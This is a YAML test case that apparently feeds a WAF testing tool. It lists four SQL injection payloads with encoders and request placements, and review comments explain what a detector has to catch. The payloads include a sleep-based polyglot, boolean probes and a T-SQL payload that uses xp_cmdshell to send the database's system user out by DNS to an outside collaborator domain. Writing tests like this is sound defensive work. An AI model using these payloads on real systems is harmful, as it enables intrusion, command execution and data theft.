gitex2026/AttackSurface/dist/testcases/owasp/sql-injection.yml
2026-04-24 19:18:37 +00:00


# SQL injection test case for exercising a request-filtering layer (WAF or
# similar). Each payload is a sample the layer under test is presumably
# expected to flag, given the file sits in the "owasp" test set.
# NOTE(review): the key set (payload / encoder / placeholder / type) looks
# like a GoTestWAF-style test case; presumably every payload is sent once per
# encoder x placeholder combination -- confirm against the runner.
payload:
# Time-based probe: the same sleep(15) subquery appears in an unquoted, a
# single-quoted and a double-quoted (%22) position, so one string fits several
# quoting contexts. A detector has to recognise it in all three.
- "(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'%22+(select(0)from(select(sleep(15)))v)+%22*/"
# T-SQL stacked statements separated by inline /* */ comments: a 'ping'
# command line embedding the hex-encoded SYSTEM_USER as a hostname label is
# built and passed to xp_cmdshell. The lookup domain is split across a string
# concatenation, so matching on the literal domain alone will not catch it;
# DECLARE / EXEC after ';' and the xp_cmdshell call are the sturdier signals.
# The domain is third-party: replaying this against a backend that really is
# injectable would send DNS lookups to it, so use a disposable target.
- "3;/* a */ DECLARE @c varchar(255);/* b */SELECT @c='ping '+master.sys.fn_varbintohexstr(convert(varbinary,SYSTEM_USER))+'.000.burpcol'+'laborator.net';/*xx*/ EXEC Master.dbo.xp_cmdshell @c;/*xxx*/ EXEC sp_SYS_ProtoOp @id=3"
# Boolean probe that closes a single-quoted, parenthesised value and compares
# a JSON_EXTRACT() result instead of using a classic 1=1 tautology.
- "-1134') OR JSON_EXTRACT('{''aKER'': 9648}', '$.aKER') = 9648*7799 AND ('QlYa' LIKE 'QlYa"
# Boolean probe for a parenthesised numeric context: a tautology (12=12)
# combined with a JSON_DEPTH() comparison.
- "123) AND 12=12 AND JSON_DEPTH('{}') != 2521"
# Transformations applied to each payload before it is sent; the names are
# resolved by the test runner, not defined in this file.
# NOTE(review): no un-encoded (plain) variant is listed here -- confirm the
# raw form of these payloads is covered by another test case or by the runner.
# NOTE(review): the first payload already contains %22, so the URL encoder
# presumably yields a double-encoded quote -- confirm that is intended.
encoder:
- Base64Flat
- URL
# Request locations the payload is placed in; coverage spans path, query
# parameter, JSON body, header and both form encodings.
placeholder:
- URLPath
- URLParam
- JSONRequest
- Header
- HTMLForm
- HTMLMultipartForm
# Category label; presumably used to group results in reports.
type: SQL Injection